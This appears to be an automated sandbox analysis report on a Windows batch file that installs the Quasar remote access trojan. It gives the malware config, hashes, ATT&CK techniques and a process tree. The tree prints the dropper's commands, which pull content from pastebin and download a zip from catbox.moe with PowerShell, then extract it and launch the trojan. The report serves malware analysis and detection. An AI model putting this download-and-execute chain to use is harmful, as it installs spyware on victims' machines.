quasar | 5ca9a2c19250bb7e24b1ce6de998386902f85e02d0dc777bc966f89f7b6c72df

Analysis

max time kernel
34s
max time network
36s
platform
windows10-2004_x64
resource
win10v2004-20250217-de
resource tags

arch:x64arch:x86image:win10v2004-20250217-delocale:de-deos:windows10-2004-x64systemwindows
submitted
19/02/2025, 15:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WVX0HPs9.bat
Size

3KB
MD5

6311ef928819a3db31bf7a4ab82659c9
SHA1

22756e3473424eb89bd9192d521a988eb5b1a6ec
SHA256

5ca9a2c19250bb7e24b1ce6de998386902f85e02d0dc777bc966f89f7b6c72df
SHA512

e8622625710f856699b81652f124419c1281996bb9813bde102b2e776605000a989dcf591b47e4e9915e9b1333c95d6fdfa6357fa6d1d2f00dbc6e4d6c922683

Score

10^/10

quasar mango execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Mango

127.0.0.1:55

Mutex

81144d00-03a7-411e-ad0a-85c775a5c9b6

Attributes

encryption_key
5A734203EC0AA048E5F7AC95F09DDA0772C38162
install_name
Mango.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime Broker Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000c0000000006d1-49.dat	family_quasar
behavioral2/memory/3504-52-0x0000000000500000-0x0000000000824000-memory.dmp	family_quasar

Blocklisted process makes network request 1 IoCs

flow	pid	Process
25	1280	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3856	powershell.exe
1280	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3504	Client-built.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	pastebin.com
3	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
3856	powershell.exe
3856	powershell.exe
1280	powershell.exe
1280	powershell.exe
952	powershell.exe
952	powershell.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4536	WMIC.exe
Token: SeSecurityPrivilege	4536	WMIC.exe
Token: SeTakeOwnershipPrivilege	4536	WMIC.exe
Token: SeLoadDriverPrivilege	4536	WMIC.exe
Token: SeSystemProfilePrivilege	4536	WMIC.exe
Token: SeSystemtimePrivilege	4536	WMIC.exe
Token: SeProfSingleProcessPrivilege	4536	WMIC.exe
Token: SeIncBasePriorityPrivilege	4536	WMIC.exe
Token: SeCreatePagefilePrivilege	4536	WMIC.exe
Token: SeBackupPrivilege	4536	WMIC.exe
Token: SeRestorePrivilege	4536	WMIC.exe
Token: SeShutdownPrivilege	4536	WMIC.exe
Token: SeDebugPrivilege	4536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4536	WMIC.exe
Token: SeRemoteShutdownPrivilege	4536	WMIC.exe
Token: SeUndockPrivilege	4536	WMIC.exe
Token: SeManageVolumePrivilege	4536	WMIC.exe
Token: 33	4536	WMIC.exe
Token: 34	4536	WMIC.exe
Token: 35	4536	WMIC.exe
Token: 36	4536	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4536	WMIC.exe
Token: SeSecurityPrivilege	4536	WMIC.exe
Token: SeTakeOwnershipPrivilege	4536	WMIC.exe
Token: SeLoadDriverPrivilege	4536	WMIC.exe
Token: SeSystemProfilePrivilege	4536	WMIC.exe
Token: SeSystemtimePrivilege	4536	WMIC.exe
Token: SeProfSingleProcessPrivilege	4536	WMIC.exe
Token: SeIncBasePriorityPrivilege	4536	WMIC.exe
Token: SeCreatePagefilePrivilege	4536	WMIC.exe
Token: SeBackupPrivilege	4536	WMIC.exe
Token: SeRestorePrivilege	4536	WMIC.exe
Token: SeShutdownPrivilege	4536	WMIC.exe
Token: SeDebugPrivilege	4536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4536	WMIC.exe
Token: SeRemoteShutdownPrivilege	4536	WMIC.exe
Token: SeUndockPrivilege	4536	WMIC.exe
Token: SeManageVolumePrivilege	4536	WMIC.exe
Token: 33	4536	WMIC.exe
Token: 34	4536	WMIC.exe
Token: 35	4536	WMIC.exe
Token: 36	4536	WMIC.exe
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	1280	powershell.exe
Token: SeDebugPrivilege	952	powershell.exe
Token: SeDebugPrivilege	3504	Client-built.exe
Token: SeDebugPrivilege	3676	taskmgr.exe
Token: SeSystemProfilePrivilege	3676	taskmgr.exe
Token: SeCreateGlobalPrivilege	3676	taskmgr.exe
Token: 33	3676	taskmgr.exe
Token: SeIncBasePriorityPrivilege	3676	taskmgr.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
3504	Client-built.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe

Suspicious use of SendNotifyMessage 43 IoCs

pid	Process
3504	Client-built.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe
3676	taskmgr.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 3988 wrote to memory of 4512	3988	cmd.exe	89
PID 3988 wrote to memory of 4512	3988	cmd.exe	89
PID 4512 wrote to memory of 4536	4512	cmd.exe	90
PID 4512 wrote to memory of 4536	4512	cmd.exe	90
PID 3988 wrote to memory of 4792	3988	cmd.exe	92
PID 3988 wrote to memory of 4792	3988	cmd.exe	92
PID 3988 wrote to memory of 3856	3988	cmd.exe	93
PID 3988 wrote to memory of 3856	3988	cmd.exe	93
PID 3856 wrote to memory of 4112	3856	powershell.exe	95
PID 3856 wrote to memory of 4112	3856	powershell.exe	95
PID 3856 wrote to memory of 3320	3856	powershell.exe	96
PID 3856 wrote to memory of 3320	3856	powershell.exe	96
PID 3988 wrote to memory of 1280	3988	cmd.exe	97
PID 3988 wrote to memory of 1280	3988	cmd.exe	97
PID 3988 wrote to memory of 2840	3988	cmd.exe	98
PID 3988 wrote to memory of 2840	3988	cmd.exe	98
PID 3988 wrote to memory of 952	3988	cmd.exe	99
PID 3988 wrote to memory of 952	3988	cmd.exe	99
PID 952 wrote to memory of 3504	952	powershell.exe	100
PID 952 wrote to memory of 3504	952	powershell.exe	100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WVX0HPs9.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get UUID /value
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4536
- C:\Windows\system32\curl.exe
  curl -s https://pastebin.com/raw/GKY7G8Wq
  2⤵
  PID:4792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\Chrome.ps1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3856
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C "echo >NUL>11"
    3⤵
    PID:4112
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C "del 11 /q /f"
    3⤵
    PID:3320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Invoke-Webrequest https://files.catbox.moe/ixzemy.zip -OutFile ew3ypm.zip"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1280
- C:\Windows\system32\tar.exe
  tar -xf ew3ypm.zip
  2⤵
  PID:2840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "start Client-built"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Users\Admin\AppData\Local\Client-built.exe
    "C:\Users\Admin\AppData\Local\Client-built.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3504

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3676

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Client-built.exe

Filesize
3.1MB

MD5
0d6b997f8a4663c7dbb2c3f594a8fc17

SHA1
11ce243b2bb6a49d78b58037b92e9bb22aaf2d3c

SHA256
6b4d4500e8215ccd55206adb5127732953f1a99bfdfba6f9f5e7f9b63af45275

SHA512
b7fd4ab9aea9a3372ed77bb1dbcab2d7bd25623e8c4022f4cbb0df3bd34f062e8a140c65acd956e8acf965df77eb0f715bce8675deda2e47f4481f78ad32633b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1138662ee58500a1a33c2f9bedb8dc1e

SHA1
afc8d56f44a00253c1987dd9574f7001d3e4c11f

SHA256
e3489f9d7b43204b0804dd676d800dcaad7517118686dd6e473d2299fccb2d59

SHA512
2dd63d816d27d0508b0f91a45860832dbbd3b6a45f0fd5b59401dc4ac091e2d71156a0fa62e7febfc82e1beca49789a8fcd5b7cbabd1ccf559be333f4506095e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
612b19feac3b60bdc771ec888769ea75

SHA1
cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

SHA256
3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

SHA512
2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

Download Submit
C:\Users\Admin\AppData\Local\Temp\11

Filesize
30B

MD5
2807dc433cc02b5207ab0b3d6022aa3f

SHA1
4e04c44b0fabaf8156478ad94d3cae0d14eb0b88

SHA256
6b4567d372db7c806ae74f49e6db3c0310f62474a570b902709e58bd580f4807

SHA512
dacc7eb5551806b3fff5b9575fb28ca27969336f0e5147a323bf1258126ab651a963693deb54b27dce1aabc8fab806c4fbace3449e0274140af26231c7bd0135

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome.ps1

Filesize
11KB

MD5
851ac375f614e95773a95c1887049481

SHA1
e53e7ff7555edcc0f06910d55d2bf001895e0692

SHA256
725fbefc25dda20fe1710a2f0d0d70a4e7a672c9c3f33e128226b671c72b07c1

SHA512
185d49f2c1a5303da0bcf075ec7d1cb9bd0fe051c7d8070473292aa641bfaa4d5d9fb84429d9e23a8e1f0e9a54b437e874fafa912b685f81112eb3023dc66fa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mngjhpjp.n3k.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\ew3ypm.zip

Filesize
1.2MB

MD5
8ab4f67cc6f9f62fe920e8a12265bf8e

SHA1
59dbab1622c530a7af8ecc1dff32f823406fd4b1

SHA256
2340d6616c8f8d4477ef532e8966ec243b4928c704411cc6371882b8326d8a02

SHA512
e02ab8e64f3a1d496d95a5c7b0b20a803e7d9c9450246af82b3d9b9317a78011b2eb837ce501b70ab1c0599fb86112916772ce603bde64cd9579ef39854b4a2e

Download Submit
memory/1280-34-0x000002B4E6EF0000-0x000002B4E6F06000-memory.dmp

Filesize
88KB

Download
memory/3504-54-0x000000001C040000-0x000000001C0F2000-memory.dmp

Filesize
712KB

Download
memory/3504-53-0x000000001BF30000-0x000000001BF80000-memory.dmp

Filesize
320KB

Download
memory/3504-52-0x0000000000500000-0x0000000000824000-memory.dmp

Filesize
3.1MB

Download
memory/3676-56-0x00000275C76E0000-0x00000275C76E1000-memory.dmp

Filesize
4KB

Download
memory/3676-57-0x00000275C76E0000-0x00000275C76E1000-memory.dmp

Filesize
4KB

Download
memory/3676-61-0x00000275C76E0000-0x00000275C76E1000-memory.dmp

Filesize
4KB

Download
memory/3676-62-0x00000275C76E0000-0x00000275C76E1000-memory.dmp

Filesize
4KB

Download
memory/3676-63-0x00000275C76E0000-0x00000275C76E1000-memory.dmp

Filesize
4KB

Download
memory/3676-64-0x00000275C76E0000-0x00000275C76E1000-memory.dmp

Filesize
4KB

Download
memory/3676-65-0x00000275C76E0000-0x00000275C76E1000-memory.dmp

Filesize
4KB

Download
memory/3676-66-0x00000275C76E0000-0x00000275C76E1000-memory.dmp

Filesize
4KB

Download
memory/3676-55-0x00000275C76E0000-0x00000275C76E1000-memory.dmp

Filesize
4KB

Download
memory/3676-67-0x00000275C76E0000-0x00000275C76E1000-memory.dmp

Filesize
4KB

Download
memory/3856-13-0x0000025B34A00000-0x0000025B34A10000-memory.dmp

Filesize
64KB

Download
memory/3856-1-0x00007FFA96543000-0x00007FFA96545000-memory.dmp

Filesize
8KB

Download
memory/3856-2-0x0000025B4F020000-0x0000025B4F0A6000-memory.dmp

Filesize
536KB

Download
memory/3856-12-0x0000025B4EF90000-0x0000025B4EFB2000-memory.dmp

Filesize
136KB

Download
memory/3856-22-0x00007FFA96540000-0x00007FFA97001000-memory.dmp

Filesize
10.8MB

Download
memory/3856-14-0x00007FFA96540000-0x00007FFA97001000-memory.dmp

Filesize
10.8MB

Download
memory/3856-15-0x00007FFA96540000-0x00007FFA97001000-memory.dmp

Filesize
10.8MB

Download
memory/3856-16-0x0000025B4F2C0000-0x0000025B4F3C4000-memory.dmp

Filesize
1.0MB

Download